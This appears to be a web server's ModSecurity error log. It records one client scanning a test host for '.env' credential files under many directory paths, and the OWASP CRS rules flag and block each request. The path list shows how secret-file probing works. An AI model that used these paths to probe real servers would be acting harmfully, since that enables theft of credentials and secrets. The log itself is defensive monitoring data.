[Wed Jan 14 12:05:14.069775 2026] [:error] [pid 1400439] [client 35.180.113.122:47290] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02AAAAAE"]
[Wed Jan 14 12:05:14.069984 2026] [:error] [pid 1400439] [client 35.180.113.122:47290] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02AAAAAE"]
[Wed Jan 14 12:05:14.070141 2026] [:error] [pid 1400439] [client 35.180.113.122:47290] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02AAAAAE"]
[Wed Jan 14 12:05:14.152657 2026] [:error] [pid 1409076] [client 35.180.113.122:47336] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWd4aktembrIGtEDNjOE9gAAAAg"]
[Wed Jan 14 12:05:14.152903 2026] [:error] [pid 1409076] [client 35.180.113.122:47336] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWd4aktembrIGtEDNjOE9gAAAAg"]
[Wed Jan 14 12:05:14.153359 2026] [:error] [pid 1409076] [client 35.180.113.122:47336] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWd4aktembrIGtEDNjOE9gAAAAg"]
[Wed Jan 14 12:05:14.232799 2026] [:error] [pid 1400440] [client 35.180.113.122:47372] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWd4auhQc121WA46NGcXyQAAAAI"]
[Wed Jan 14 12:05:14.233012 2026] [:error] [pid 1400440] [client 35.180.113.122:47372] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWd4auhQc121WA46NGcXyQAAAAI"]
[Wed Jan 14 12:05:14.233170 2026] [:error] [pid 1400440] [client 35.180.113.122:47372] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWd4auhQc121WA46NGcXyQAAAAI"]
[Wed Jan 14 12:05:14.312000 2026] [:error] [pid 1400442] [client 35.180.113.122:47414] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWd4andjbuaU9rmVGArPTQAAAAQ"]
[Wed Jan 14 12:05:14.312217 2026] [:error] [pid 1400442] [client 35.180.113.122:47414] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWd4andjbuaU9rmVGArPTQAAAAQ"]
[Wed Jan 14 12:05:14.312387 2026] [:error] [pid 1400442] [client 35.180.113.122:47414] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWd4andjbuaU9rmVGArPTQAAAAQ"]
[Wed Jan 14 12:05:14.392143 2026] [:error] [pid 1400441] [client 35.180.113.122:47452] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWd4avDQTrRwdMNdhh-mxAAAAAM"]
[Wed Jan 14 12:05:14.392446 2026] [:error] [pid 1400441] [client 35.180.113.122:47452] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWd4avDQTrRwdMNdhh-mxAAAAAM"]
[Wed Jan 14 12:05:14.392666 2026] [:error] [pid 1400441] [client 35.180.113.122:47452] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWd4avDQTrRwdMNdhh-mxAAAAAM"]
[Wed Jan 14 12:05:14.473637 2026] [:error] [pid 1400463] [client 35.180.113.122:47490] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWd4ahBlpHg03ETPJhlXGwAAAAU"]
[Wed Jan 14 12:05:14.473956 2026] [:error] [pid 1400463] [client 35.180.113.122:47490] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWd4ahBlpHg03ETPJhlXGwAAAAU"]
[Wed Jan 14 12:05:14.474178 2026] [:error] [pid 1400463] [client 35.180.113.122:47490] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWd4ahBlpHg03ETPJhlXGwAAAAU"]
[Wed Jan 14 12:05:14.554096 2026] [:error] [pid 1405561] [client 35.180.113.122:47544] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWd4ajszkuqYgM6kDsoCpgAAAAc"]
[Wed Jan 14 12:05:14.554312 2026] [:error] [pid 1405561] [client 35.180.113.122:47544] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWd4ajszkuqYgM6kDsoCpgAAAAc"]
[Wed Jan 14 12:05:14.554492 2026] [:error] [pid 1405561] [client 35.180.113.122:47544] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWd4ajszkuqYgM6kDsoCpgAAAAc"]
[Wed Jan 14 12:05:14.643364 2026] [:error] [pid 1400438] [client 35.180.113.122:47592] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWd4akBaCnzgGdZXs4_g5wAAAAA"]
[Wed Jan 14 12:05:14.643603 2026] [:error] [pid 1400438] [client 35.180.113.122:47592] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWd4akBaCnzgGdZXs4_g5wAAAAA"]
[Wed Jan 14 12:05:14.643760 2026] [:error] [pid 1400438] [client 35.180.113.122:47592] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWd4akBaCnzgGdZXs4_g5wAAAAA"]
[Wed Jan 14 12:05:14.722328 2026] [:error] [pid 1401182] [client 35.180.113.122:47642] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWd4avL7maAL7YwXfyRGBQAAAAY"]
[Wed Jan 14 12:05:14.722581 2026] [:error] [pid 1401182] [client 35.180.113.122:47642] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWd4avL7maAL7YwXfyRGBQAAAAY"]
[Wed Jan 14 12:05:14.722736 2026] [:error] [pid 1401182] [client 35.180.113.122:47642] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWd4avL7maAL7YwXfyRGBQAAAAY"]
[Wed Jan 14 12:05:14.801574 2026] [:error] [pid 1400439] [client 35.180.113.122:47682] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02QAAAAE"]
[Wed Jan 14 12:05:14.801792 2026] [:error] [pid 1400439] [client 35.180.113.122:47682] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02QAAAAE"]
[Wed Jan 14 12:05:14.801947 2026] [:error] [pid 1400439] [client 35.180.113.122:47682] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWd4ahZiJWN5ANZoWOd02QAAAAE"]
[Wed Jan 14 12:05:14.881234 2026] [:error] [pid 1409076] [client 35.180.113.122:47718] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWd4aktembrIGtEDNjOE9wAAAAg"]
[Wed Jan 14 12:05:14.881449 2026] [:error] [pid 1409076] [client 35.180.113.122:47718] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWd4aktembrIGtEDNjOE9wAAAAg"]
[Wed Jan 14 12:05:14.881612 2026] [:error] [pid 1409076] [client 35.180.113.122:47718] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWd4aktembrIGtEDNjOE9wAAAAg"]
[Wed Jan 14 12:05:14.964990 2026] [authz_core:error] [pid 1400440] [client 35.180.113.122:47762] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Wed Jan 14 12:05:15.048885 2026] [:error] [pid 1400442] [client 35.180.113.122:47816] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTgAAAAQ"]
[Wed Jan 14 12:05:15.049117 2026] [:error] [pid 1400442] [client 35.180.113.122:47816] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTgAAAAQ"]
[Wed Jan 14 12:05:15.049289 2026] [:error] [pid 1400442] [client 35.180.113.122:47816] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTgAAAAQ"]
[Wed Jan 14 12:05:15.131688 2026] [:error] [pid 1400441] [client 35.180.113.122:47856] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxQAAAAM"]
[Wed Jan 14 12:05:15.131910 2026] [:error] [pid 1400441] [client 35.180.113.122:47856] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxQAAAAM"]
[Wed Jan 14 12:05:15.132072 2026] [:error] [pid 1400441] [client 35.180.113.122:47856] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxQAAAAM"]
[Wed Jan 14 12:05:15.212267 2026] [:error] [pid 1400463] [client 35.180.113.122:47896] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWd4axBlpHg03ETPJhlXHAAAAAU"]
